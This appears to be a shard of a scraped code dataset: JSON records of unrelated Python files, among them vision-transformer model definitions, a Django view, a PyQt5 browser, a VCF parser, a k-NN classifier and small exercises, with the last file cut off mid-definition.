model\n\n\n@register_model\ndef deit_small_patch16_224(pretrained=False, **kwargs):\n model = VisionTransformer(\n patch_size=16, embed_dim=384, depth=12, num_heads=6, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_small_patch16_224-cd65a155.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\n\n@register_model\ndef deit_base_patch16_224(pretrained=False, **kwargs):\n model = VisionTransformer(\n patch_size=16, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_base_patch16_224-b5f2ef4d.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\n\n@register_model\ndef deit_tiny_distilled_patch16_224(pretrained=False, **kwargs):\n model = DistilledVisionTransformer(\n patch_size=16, embed_dim=192, depth=12, num_heads=3, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_tiny_distilled_patch16_224-b40b3cf7.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\n\n@register_model\ndef deit_small_distilled_patch16_224(pretrained=False, **kwargs):\n model = DistilledVisionTransformer(\n patch_size=16, embed_dim=384, depth=12, num_heads=6, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_small_distilled_patch16_224-649709d9.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\n\n@register_model\ndef deit_base_distilled_patch16_224(pretrained=False, **kwargs):\n model = DistilledVisionTransformer(\n patch_size=16, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_base_distilled_patch16_224-df68dfff.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\n\n@register_model\ndef deit_base_patch16_384(pretrained=False, **kwargs):\n model = VisionTransformer(\n img_size=384, patch_size=16, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_base_patch16_384-8de9b5d1.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\n\n@register_model\ndef deit_base_distilled_patch16_384(pretrained=False, **kwargs):\n model = DistilledVisionTransformer(\n img_size=384, patch_size=16, embed_dim=768, depth=12, num_heads=12, mlp_ratio=4, qkv_bias=True,\n norm_layer=partial(nn.LayerNorm, eps=1e-6), **kwargs)\n model.default_cfg = _cfg()\n if pretrained:\n checkpoint = torch.hub.load_state_dict_from_url(\n url=\"https://dl.fbaipublicfiles.com/deit/deit_base_distilled_patch16_384-d0272ac0.pth\",\n map_location=\"cpu\", check_hash=True\n )\n model.load_state_dict(checkpoint[\"model\"])\n return model\n\ndef _create_resnet(variant, pretrained=False, **kwargs):\n del kwargs['args']\n return build_model_with_cfg(ResNet, variant, pretrained, default_cfg=_cfg_resnet(), **kwargs)\n\n@register_model\ndef resnet50(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-50 model.\n \"\"\"\n model_args = dict(block=Bottleneck, layers=[3, 4, 6, 3], **kwargs)\n model = _create_resnet('resnet50', pretrained, **model_args)\n # model.default_cfg = _cfg_resnet()\n return model\n\n@register_model\ndef resnet101(pretrained=False, **kwargs):\n \"\"\"Constructs a ResNet-101 model.\n \"\"\"\n model_args = dict(block=Bottleneck, layers=[3, 4, 23, 3], **kwargs)\n model = _create_resnet('resnet101', pretrained, **model_args)\n return model","repo_name":"zhoubenjia/MotionRGBD-PAMI","sub_path":"lib/model/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":19617,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"37905864837","text":"\"\"\"\nTo render html web pages\n\"\"\"\n\nimport random\n\nfrom django.http import HttpResponse\nfrom django.template.loader import get_template, render_to_string\n\nfrom articles.models import Article\n\n\ndef article_home_view(request):\n return HttpResponse\n\n\ndef home_view(request, *args, **kwargs):\n \"\"\"\n Take in a request from Django\n Return HTML as a response\n \"\"\"\n print(id)\n name = \"Harpreet\"\n number = random.randint(1, 4)\n article_obj = Article.objects.get(id=number)\n article_queryset = Article.objects.all\n\n context = {\n \"object\": article_obj,\n \"object_list\": article_queryset,\n \"title\": article_obj.title,\n \"id\": article_obj.id,\n \"content\": article_obj.content\n }\n\n tmpl = get_template(\"home-view.html\")\n tmpl_string = tmpl.render(context=context)\n\n html_string = render_to_string(\"home-view.html\", context=context)\n\n return HttpResponse(tmpl_string)\n","repo_name":"hssainidev/Try-Django","sub_path":"try_django/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1056778913","text":"import streamlit as st\r\nimport matplotlib.pyplot as plt\r\nfrom fpdf import FPDF\r\nimport base64\r\nfrom matplotlib.pyplot import fill\r\nimport numpy as np\r\nfrom tempfile import NamedTemporaryFile\r\n\r\nfrom xarray import align\r\n\r\ndef create_download_link(val, filename):\r\n b64 = base64.b64encode(val) # val looks like b'...'\r\n return f'Download file' \r\n\r\n#framework style\r\n#pdf_w=210\r\n#pdf_h=297 \r\n\r\n#def lines(pdf):\r\n #pdf.set_fill_color(255, 255, 255) # color for outer rectangle\r\n #pdf.rect(5.0, 5.0, 200.0,287.0,'DF')\r\n #pdf.set_fill_color(255, 255, 255) # color for inner rectangle\r\n #pdf.rect(8.0, 8.0, 194.0,282.0,'FD')\r\n#Tittle\r\ndef tittle(pdf):\r\n\tpdf.set_font('Arial', 'B', 16)\r\n\tpdf.cell(200, 10, txt = \"Google Maps Dashboard\", ln = 1, align = 'C')\r\n#Logo\r\ndef logo(pdf):\r\n\tpdf.image(name = 'logo1.png', x = 65, y = 19, w = 90, h = 50, link = 'http://localhost:8501/media/f27f03a91f9ea879ce3fac82f75f94d9cc4b318f6b0338dac6b93970.png')\r\n\r\n#i = 2\r\n#business_name = 'Chili\\'s'\r\n#types = ['Restaurant', 'Food', 'Place of Interest']\r\n#Business name\r\nbusiness_name = 'Chilli\\'s' \r\ndef business(pdf, business_name):\r\n\tpdf.set_font('Arial', 'B', 18)\r\n\tpdf.text(x = 100, y = 70, txt = business_name)\r\n#Business type\r\ntypes = ['Restaurant', 'Food', 'Place of Interest']\r\ndef business_types(pdf, item, y):\r\n\tpdf.set_font('Arial', '', 14)\r\n\t#pdf.set_text_color(102, 102, 255)\r\n\tpdf.text(x = 10, y = y, txt = item)\r\n#Address\r\naddress = 'C. 60 local 124, Zona Indiustrial'\r\ndef business_address(pdf, address):\r\n\tpdf.set_font('Arial', '', 14)\r\n\tpdf.text(x = 33, y = 125, txt = address)\r\n#business\r\ndef column_my_business(pdf):\r\n\tpdf.set_font('Arial', 'B', 14)\r\n\tpdf.text(x = 30, y= 140, txt = 'My business')\r\n\tpdf.text(x = 150, y = 140, txt = 'Others')\r\n#rating\r\nmy_rating = '4.2'\r\nother_rating = '4.0'\r\ndef business_rating(pdf, my_rating, other_rating):\r\n\tpdf.set_font('Arial', '', 12)\r\n\tpdf.text(x = 52, y= 150, txt = my_rating)\r\n\tpdf.text(x = 183, y = 150, txt = other_rating)\r\n#price level\r\nmy_price_level = '4.0'\r\nother_price_level = '3.0'\r\ndef pricing_level(pdf, my_price_level, other_price_level):\r\n\tpdf.set_font('Arial', '', 12)\r\n\tpdf.text(x = 61, y = 160, txt = my_price_level)\r\n\tpdf.text(x = 192, y = 160, txt = other_price_level)\r\n#comments\r\nmy_comment_number = '150'\r\nother_comment_number = '120'\r\ndef comment_number(pdf, my_comment_number, other_comment_number):\r\n\tpdf.set_font('Arial', '', 12)\r\n\tpdf.text(x = 61, y = 170, txt = my_price_level)\r\n\tpdf.text(x = 186, y = 170, txt = other_price_level)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\nclass PDF(FPDF): \r\n\r\n\tpdf = FPDF()#pdf object\r\n\tpdf = FPDF(orientation='L')\r\n\tpdf = FPDF(unit='mm') #unit of measurement\r\n\tpdf = FPDF(format='A4') #page format. A4 is the default value of the format, you don't have to specify it.\r\n\tpdf = FPDF(orientation='P', unit='mm', format='A4')\r\n\r\n\t\r\n\r\n\tpdf.add_page()\r\n\t#lines(pdf)\r\n\ttittle(pdf) \r\n\tlogo(pdf)\r\n\tbusiness(pdf, business_name)\r\n\t#pdf.set_text_color(220, 50, 50)\r\n\tpdf.text(x = 10, y = 80, txt = 'Types:')\r\n\ty = 90\r\n\tfor item in types:\r\n\t\tbusiness_types(pdf, item, y)\r\n\t\ty += 10\r\n\tpdf.set_font('Arial', 'B', 14)\r\n\tpdf.text(x = 10, y = 125, txt = 'Address: ')\r\n\tbusiness_address(pdf, address)\r\n\tcolumn_my_business(pdf)\r\n\tpdf.set_font('Arial', 'B', 12)\r\n\tpdf.text(x = 30, y = 150, txt = 'My rating:')\r\n\tpdf.set_font('Arial', 'B', 12)\r\n\tpdf.text(x = 150, y = 150, txt = 'Average rating:')\r\n\tbusiness_rating(pdf, my_rating, other_rating)\r\n\tpdf.set_font('Arial', 'B', 12)\r\n\tpdf.text(x = 30, y = 160, txt = 'My price level:')\r\n\tpdf.set_font('Arial', 'B', 12)\r\n\tpdf.text(x = 150, y = 160, txt = 'Average price level:')\r\n\tpricing_level(pdf, my_price_level, other_price_level)\r\n\tpdf.set_font('Arial', 'B', 12)\r\n\tpdf.text(x = 30, y = 170, txt = 'My comments:')\r\n\tpdf.set_font('Arial', 'B', 12)\r\n\tpdf.text(x = 150, y = 170, txt = 'Other comments:')\r\n\tcomment_number(pdf, my_comment_number, other_price_level)\r\n\thtml = create_download_link(pdf.output(dest=\"S\").encode(\"latin-1\"), \"testfile\")\r\n\tst.markdown(html, unsafe_allow_html=True)\r\n\tpdf.output('test.pdf','F')\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\t\r\n\r\n\t\r\n\r\n\r\n\t\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"isabel-eng/Maps","sub_path":"pdf.py","file_name":"pdf.py","file_ext":"py","file_size_in_byte":4195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27610427903","text":"import sys\nimport os\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nQCoreApplication.setAttribute(Qt.AA_UseOpenGLES)\nQCoreApplication.setAttribute(Qt.AA_ShareOpenGLContexts)\nQCoreApplication.setAttribute(Qt.AA_UseDesktopOpenGL)\nfrom PyQt5.QtGui import *\nfrom urllib.parse import urlparse\nfrom PyQt5.QtWebEngineWidgets import *\n\n\n\nclass BrowserTab(QWidget):\n def __init__(self, url):\n super(BrowserTab, self).__init__()\n\n # Create the browser widget and set the default url\n self.browser = QWebEngineView()\n self.setAttribute(Qt.WA_DeleteOnClose)\n self.browser.setUrl(QUrl(url))\n\n\n\n # Set the layout for the tab\n layout = QVBoxLayout()\n layout.addWidget(self.browser)\n self.setLayout(layout)\n\n\n\n\n self.browser.page().profile().downloadRequested.connect(self.download)\n self.browser.page().fullScreenRequested.connect(self.FullscreenRequest)\n self.is_fullscreen = False\n\n def download(self, download_item):\n # Get the suggested file name and the MIME type\n mime_type = download_item.mimeType()\n suggested_file_name = download_item.suggestedFileName()\n default_dir = QStandardPaths.writableLocation(QStandardPaths.DownloadLocation)\n # Set the default file path to the \"Downloads\" folder\n default_file_path = os.path.join(default_dir, suggested_file_name)\n # Ask the user to select a file name and a save location\n file_path, _ = QFileDialog.getSaveFileName(self, \"Save File\", default_file_path,\n \"{} files (*.{})\".format(mime_type, mime_type.split(\"/\")[-1]))\n\n # Start the download if a file path is selected\n if file_path:\n download_item.setPath(file_path)\n download_item.accept()\n\n # Add a progress bar to show the download progress\n progress_bar = QProgressBar(self)\n progress_bar.setOrientation(Qt.Horizontal)\n progress_bar.setMaximum(100)\n progress_bar.setMinimum(0)\n progress_bar.setValue(0)\n progress_bar.setTextVisible(True)\n progress_bar.setAlignment(Qt.AlignCenter)\n progress_bar.setFixedWidth(self.width())\n progress_bar.setStyleSheet(\"\"\"\n QProgressBar::chunk {\n background-color: #4CAF50;\n }\n QProgressBar {\n border: 1px solid grey;\n border-radius: 5px;\n padding: 1px;\n text-align: center;\n font: bold 12px;\n }\n \"\"\")\n self.layout().addWidget(progress_bar)\n\n # Update the progress bar with the download progress\n download_item.downloadProgress.connect(lambda bytes_received, total_bytes:\n progress_bar.setValue(int(100 * bytes_received / total_bytes)))\n\n # Connect the cancel button click event to the cancellation function\n cancel_button = QPushButton(\"Cancel\", self)\n cancel_button.clicked.connect(lambda: self.cancel_download(download_item, progress_bar, file_path))\n self.layout().addWidget(cancel_button)\n\n # Remove the progress bar, cancel button, and the downloaded file once the download is complete\n download_item.finished.connect(lambda: self.cleanup_download(progress_bar, cancel_button, file_path))\n\n def cancel_download(self, download_item, progress_bar, file_path):\n # Cancel the download and remove the progress bar\n download_item.cancel()\n progress_bar.deleteLater()\n\n # Delete the partially downloaded file\n if os.path.exists(file_path):\n os.remove(file_path)\n\n def cleanup_download(self, progress_bar, cancel_button, file_path):\n # Remove the progress bar and cancel button\n progress_bar.deleteLater()\n cancel_button.deleteLater()\n\n # Delete the downloaded file if it exists and the download was successful\n if os.path.exists(file_path):\n os.remove(file_path)\n\n def FullscreenRequest(self, request):\n request.accept()\n if request.toggleOn():\n if not self.is_fullscreen:\n self.browser.setParent(None)\n self.browser.showFullScreen()\n self.is_fullscreen = True\n else:\n if self.is_fullscreen:\n self.browser.setParent(self)\n self.layout().addWidget(self.browser)\n self.browser.showNormal()\n self.is_fullscreen = False\n\n\nclass BrowserWindow(QMainWindow):\n def __init__(self):\n super(BrowserWindow, self).__init__()\n\n self.tab_widget = QTabWidget()\n self.tab_widget.setTabsClosable(True) # Make the tabs closable\n self.tab_widget.tabCloseRequested.connect(\n self.close_tab) # Connect the tabCloseRequested signal to the close_tab function\n self.tab_widget.addTab(BrowserTab(\"http://www.google.com\"), \"Google\")\n self.tab_widget.currentChanged.connect(self.current_browser)\n self.setCentralWidget(self.tab_widget)\n self.current_browser().urlChanged.connect(self.update_urlbar)\n self.setWindowTitle(\"My Web Browser\")\n self.setWindowIcon(QIcon(\"icons/icon.png\"))\n self.setMinimumSize(600, 600)\n self.setStyleSheet(\"background-color: white;\")\n self.current_browser().urlChanged.connect(self.update_urlbar)\n self.tab_widget.currentChanged.connect(self.update_urlbar_and_tab_text)\n\n # Create the navigation toolbar and add the buttons\n navbar = QToolBar(\"Navigation\")\n\n navbar.setStyleSheet(\"\"\"\n QToolBar {\n background-color: #f2f2f2;\n border-bottom: 1px solid #d9d9d9;\n padding: 5px;\n }\n\n QToolButton {\n background-color: transparent;\n color: #333;\n border: none;\n padding: 8px;\n margin-right: 5px;\n font-weight: bold;\n }\n\n QToolButton:hover {\n background-color: rgba(0, 0, 0, 0.1);\n border-radius: 8px;\n }\n\n QToolButton:pressed {\n background-color: rgba(0, 0, 0, 0.2);\n border-radius: 8px;\n }\n\n QToolButton:checked {\n background-color: #008080;\n color: white;\n }\n \"\"\")\n\n self.addToolBar(navbar)\n navbar.setFixedHeight(50)\n\n back_btn = QAction(QIcon(\"icons/xb.png\"), \"\", self)\n back_btn.triggered.connect(lambda: self.current_browser().back())\n navbar.addAction(back_btn)\n\n forward_btn = QAction(QIcon(\"icons/xf.png\"), \"\", self)\n forward_btn.triggered.connect(lambda: self.current_browser().forward())\n navbar.addAction(forward_btn)\n\n home_btn = QAction(QIcon(\"icons/xh.png\"), \"\", self)\n home_btn.triggered.connect(lambda: self.current_browser().setUrl(QUrl(\"https://www.google.com\")))\n navbar.addAction(home_btn)\n\n reload_btn = QAction(QIcon(\"icons/x.png\"), \"\", self)\n reload_btn.triggered.connect(lambda: self.current_browser().reload())\n reload_btn.setProperty(\"showDecorationSelected\", False)\n navbar.addAction(reload_btn)\n\n self.httpsicon = QLabel()\n self.httpsicon.setStyleSheet(\"background-color: #f2f2f2; border-top: 0px solid #d9d9d9;\")\n navbar.addWidget(self.httpsicon)\n\n # Create the address bar and connect to the urlChanged signal\n self.urlbar = QLineEdit()\n self.urlbar.returnPressed.connect(self.navigate_to_url)\n self.urlbar.setFixedHeight(25)\n navbar.addWidget(self.urlbar)\n self.urlbar.setStyleSheet(\"\"\"\n background-color: #f7f7f7;\n color: black;\n border: 2px solid gray;\n border-radius: 5px;\n \"\"\")\n\n self.current_browser().urlChanged.connect(self.update_urlbar)\n\n new_tab_btn = QAction(QIcon(\"icons/yıldız.png\"), \"\", self)\n new_tab_btn.triggered.connect(self.add_tab)\n navbar.addAction(new_tab_btn)\n\n # Add a button to create a new tab\n\n # Set some window properties\n\n def update_tab_text(self, url):\n current_index = self.tab_widget.currentIndex()\n if current_index != -1:\n tab_text = self.get_tab_text_from_url(url)\n tab_text = tab_text.capitalize() # Baş harfi büyük yapma işlemi\n self.tab_widget.setTabText(current_index, tab_text)\n\n def update_urlbar_and_tab_text(self):\n current_browser = self.current_browser()\n if current_browser is not None:\n url = current_browser.url()\n self.update_urlbar(url)\n\n def get_tab_text_from_url(self, url):\n # Extract a meaningful tab text from the URL\n # Example: Get the domain name from the URL\n domain = url.netloc.split(\"www.\")[-1] # Remove \"www.\" from the domain\n domain = domain.split(\".\")[0] # Remove the extension from the domain\n return domain\n\n def add_tab(self):\n tab = BrowserTab(\"http://www.google.com\")\n self.tab_widget.addTab(tab, \"Google\")\n self.tab_widget.setCurrentWidget(tab)\n self.current_browser().urlChanged.connect(self.update_urlbar)\n\n def close_tab(self, index):\n if self.tab_widget.count() > 1:\n current_widget = self.tab_widget.widget(index)\n current_widget.deleteLater()\n self.tab_widget.removeTab(index)\n\n def navigate_to_url(self):\n url = self.urlbar.text()\n q = QUrl(url)\n if q.scheme() == \"\":\n url = \"http://\" + url\n q = QUrl(url)\n self.current_browser().setUrl(q)\n\n def update_urlbar(self, q):\n pixmap = (\n QPixmap(\"icons/ssl.png\")\n if q.scheme() == \"https\"\n else QPixmap(\"icons/lock.png\")\n )\n pixmap_size = pixmap.size() # Orijinal pixmap'in boyutunu alın\n padding = 15 # Eklemek istediğiniz boşluğun genişliği\n\n new_pixmap = QPixmap(pixmap_size.width() + padding,\n pixmap_size.height()) # Yeni bir pixmap oluşturun, genişlikte boşluk ekleyin\n new_pixmap.fill(Qt.transparent) # Pixmap'i şeffaf bir şekilde doldurun\n\n painter = QPainter(new_pixmap)\n painter.drawPixmap(padding, 0, pixmap) # Orijinal pixmap'i boşluğun sağ tarafına çizin\n painter.end()\n\n self.httpsicon.setPixmap(new_pixmap)\n\n url = urlparse(q.toString())\n self.urlbar.setText(url.netloc + url.path)\n self.urlbar.setCursorPosition(0)\n self.update_tab_text(url)\n\n def current_browser(self):\n index = self.tab_widget.currentIndex()\n if index == -1:\n return None\n return self.tab_widget.widget(index).browser\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n global_settings = QWebEngineSettings.globalSettings()\n global_settings.setAttribute(QWebEngineSettings.PluginsEnabled, True)\n global_settings.setAttribute(QWebEngineSettings.FullScreenSupportEnabled, True)\n global_settings.setAttribute(QWebEngineSettings.JavascriptEnabled, True)\n\n window = BrowserWindow()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"ByNexter/PythonBrowser","sub_path":"PythonBrowser.py","file_name":"PythonBrowser.py","file_ext":"py","file_size_in_byte":11340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6825674842","text":"#!/usr/bin/env python\nimport argparse\nfrom collections import defaultdict\nimport numpy as np\nimport pandas as pd\nimport vcf\n\ndef create_mutation_index(filenames):\n varindex = defaultdict(list)\n\n for vf in filenames:\n vcf_reader = vcf.Reader(filename=vf)\n for record in vcf_reader:\n varindex[(record.CHROM, record.POS, record.REF,str(record.ALT))].append(record)\n\n return varindex\n\n\ndef get_samples_by_record(records):\n samples = set()\n for r in records:\n for rs in r.samples:\n if rs.sample.endswith('aPC'):\n samples.add(rs.sample)\n\n return samples\n\ndef get_genes_by_record(records):\n genes = set()\n for r in records:\n for ann in r.INFO['ANN']:\n ann_fields = ann.split('|')[3]\n genes.add(ann_fields)\n return genes\n\ndef get_mean_dp_by_record(records):\n DP = []\n for r in records:\n for rs in r.samples:\n if rs.sample.endswith('aPC'):\n DP.append(r.genotype(rs.sample)['DP'])\n\n return np.mean(DP)\n\ndef get_mean_sample_field_by_record(records, field):\n val = []\n for r in records:\n for rs in r.samples:\n if rs.sample.endswith('aPC'):\n try:\n val.append(rs[field])\n except AttributeError:\n None\n\n if len(val) > 0:\n return np.mean(val)\n else:\n return 'NA'\n\n\ndef cli_interface():\n parser = argparse.ArgumentParser(description='VCF to Table.')\n parser.add_argument('--input', dest='input_filename', nargs='+', type=str, help='input VCF files', required=True)\n parser.add_argument('--output', dest='output_filename', type=str, help='output CSV files', required=True)\n args = parser.parse_args()\n return args\n\n\ndef main():\n args = cli_interface()\n\n # creating the mutation index\n varindex = create_mutation_index(args.input_filename)\n\n results = []\n # processing the index\n for mut, records in varindex.items():\n # building sample info\n samples = get_samples_by_record(records)\n genes = get_genes_by_record(records)\n dp_info = get_mean_dp_by_record(records)\n mq_info = get_mean_sample_field_by_record(records, 'MQ')\n mmq_info = get_mean_sample_field_by_record(records, 'MMQ')\n for g in genes:\n tmp_record = [mut[0], mut[1], mut[2], mut[3], dp_info, mq_info, mmq_info, len(samples), \";\".join(samples), g]\n results.append(tmp_record)\n\n # converting to dataframe and then to csv\n data_frame = pd.DataFrame(results, columns=['chrom', 'pos', 'ref','alt', 'dp', 'mq', 'mmq', 'num_samples', 'samples', 'Gene_Name' ])\n\n data_frame.to_csv(args.output_filename)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"kevs-code/python_parsing_wes","sub_path":"vcftab.py","file_name":"vcftab.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10047154217","text":"import cv2\nimport os\n\n\"\"\"\nFunction below split videos into a frames. \nFor loop iterating through the all video files in directory.\nWhile loop inside a for loop splitting images into a frames.\n\"\"\"\n\n\ndef frame_video():\n directory_videos = '/home/lab/PycharmProjects/filmy_przyciete/'\n directory_frames = '/home/lab/PycharmProjects/nagrania_frames/'\n count = 0\n\n for video in os.listdir(directory_videos):\n video = cv2.VideoCapture(directory_videos + video)\n success, image = video.read()\n\n while success:\n cv2.imwrite(directory_frames + 'frame%d.png' % count, image)\n success, image = video.read()\n # print('Read a new frame: ', success)\n count += 1\n\n\ndef crop_image():\n directory = '/home/lab/PycharmProjects/nagrania_frames/'\n dir = os.listdir(directory)\n x, y, h, w = 160, 80, 650, 1090 # set coordinates that you want\n\n for index_lista, name in enumerate(dir):\n if index_lista % 5 == 0:\n # print(index_lista)\n img = cv2.imread(directory + name)\n crop_img = img[y:h, x:w]\n cv2.imwrite('/home/lab/PycharmProjects/cropped/' + name, crop_img)\n\n\ndef delete_files():\n directory = '/home/lab/PycharmProjects/nagrania_frames/'\n\n for file in os.listdir(directory):\n os.remove(directory + file)\n\n\nprint('Start split video into a frames. . .')\nframe_video()\nprint('Start cropping. . .')\ncrop_image()\nprint('Delete files. . .')\ndelete_files()\nprint('DONE!')\n","repo_name":"krystekkk/videoFrames","sub_path":"crop.py","file_name":"crop.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22507637785","text":"#!/usr/bin/python3\n\"\"\"\nMain file for the task\n\"\"\"\n\n\ndef minOperations(n):\n \"\"\"\n Return:\n sum of their prime factors of each number\n \"\"\"\n if (n <= 1):\n return (0)\n mul = 2\n total = 0\n while (n != 1):\n if n % mul == 0:\n n /= mul\n total += mul\n mul = 2\n else:\n mul += 1\n return total\n\n\nif __name__ == '__main__':\n minOperations(n)\n","repo_name":"FoleKhali/holbertonschool-interview","sub_path":"0x02-minimum_operations/0-minoperations.py","file_name":"0-minoperations.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11246278274","text":"# Bibliotecas\nfrom statistics import mode\nfrom Scripts.distance_metrics import * \n\ndef euclidean_point(point, points):\n distances = list()\n for element in points:\n distances.append((euclidean(point, element[0]), element[1], element[0]))\n\n return distances\n\ndef minkowski_point(point, points, p):\n distances = list()\n for element in points:\n distances.append((minkowski(point, element[0], p), element[1], element[0]))\n\n return distances\n\ndef chebyshev_point(point, points):\n distances = list()\n for element in points:\n distances.append((chebyshev(point, element[0]), element[1], element[0]))\n\n return distances\n\ndef manhattan_point(point, points):\n distances = list()\n for element in points:\n distances.append((sad(point, element[0]), element[1], element[0]))\n\n return distances\n\n# Función que calcula distancias de un punto a los restantes\ndef point_to_points(point, points, distance):\n if distance == 'euclidean':\n return euclidean_point(point, points)\n elif distance == 'minkowski':\n p = int(input(\"Valor p: \"))\n return minkowski_point(point, points, p)\n elif distance == 'manhattan':\n return manhattan_point(point, points)\n elif distance == 'chebyshev':\n return chebyshev_point(point, points)\n else:\n return \"ERROR: Elige una función de distancia válida.\"\n\n# Función que retorna los k vecinos más cercanos al nuevo punto\ndef k_neighbors(new_point, dataset, k, metric):\n # Obteniendo las distancias\n distances = point_to_points(new_point, dataset, metric)\n distances.sort(key=lambda tup: tup[0])\n\n # Obteniendo los k mas cercanos\n neighbors = list()\n for i in range(k):\n neighbors.append(distances[i][1])\n\n return neighbors, mode(neighbors), distances[:k]\n\n\n# Función que predice las clases para todas las muestras\n# de un conjunto nuevo\ndef classify(train_data, test_data, k, metric):\n xy = [-1, -1]\n predicted = list()\n for sample in test_data:\n xy[0] = k_neighbors(sample[0], train_data, k, metric)[1]\n xy[1] = sample[1]\n predicted.append((xy[0], xy[1]))\n\n return predicted\n","repo_name":"gallardorafael/ML_From_Scratch","sub_path":"Notebooks/Scripts/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73985921155","text":"\nperson = {'name': 'Jack', 'age': 23}\n\n# sentence = 'My name is ' + person['name'] + ' and I am ' + str(person['age']) + ' years old.'\n# print(sentence)\n\n\nsentence = 'My name is {} and I am {} years old.'.format(person['name'], person['age'])\nprint(sentence)\n\n# Print out tagged text\ntag = 'h1'\ntext = 'This is a headline'\n\ntagged_text = '<{0}>{1}'.format(tag, text)\nprint(tagged_text)\n\n\nclass Person():\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\np1 = Person('Jack', '23')\n\nsentence2 = 'My name is {0.name} and I am {0.age} years old.'.format(p1)\nprint(sentence2)\n\n# sentence = 'My name is {name} and I am {age} years old.'.format(name='Jenn', age='30')\n# print(sentence)\n\n# sentence = 'My name is {name} and I am {age} years old.'.format(**person)\n# print(sentence)\n\n# Print pi to two decimal places\npi = 3.14159265\npi_value = 'Pi is equal to {:.2f}'.format(pi)\n\nprint(pi_value)\n\n\n# Comma separated large values\nsentence3 = '1 MB is equal to {,} bytes'.format(1000**2)\n\nprint(sentence3)\n\n\n# Print out Dates\nimport datetime\nmy_date = datetime.datetime(2020, 9, 24, 12, 30, 45)\n\n# September 24, 2021\nformatted_date = '{:%B %d, %Y}'.format(my_date)\n\nprint(formatted_date)\n\n# September 24, 2021 fell on a Friday and was the 267 day of the year.\n\nsentence_date = '{0:%B %d, %Y} fell on a {0:%A} and was the {0:%j} day of the year'.format(my_date)\n\nprint(sentence_date)\n","repo_name":"edwardelric11/code_bits","sub_path":"string_formatting/formatting.py","file_name":"formatting.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28475986444","text":"# coding: utf-8\nimport socket\nimport json\nimport logging\n\nimport tornado.web\nimport tornado.websocket\nimport tornado.httpclient\nimport tornado.ioloop\nimport tornado.gen\n\nfrom .models import User, Request, Client, WSProxy\nfrom .interactive import InteractiveServer\n\n\nlogger = logging.getLogger(__file__)\n\n\nclass BaseWehSocketHandler:\n def prepare(self):\n self.app = self.settings[\"app\"]\n child, parent = socket.socketpair()\n addr = (self.request.remote_ip, 0)\n self.client = Client(parent, addr, self.current_user)\n self.proxy = WSProxy(self, child)\n self.app.clients.append(self.client)\n\n def 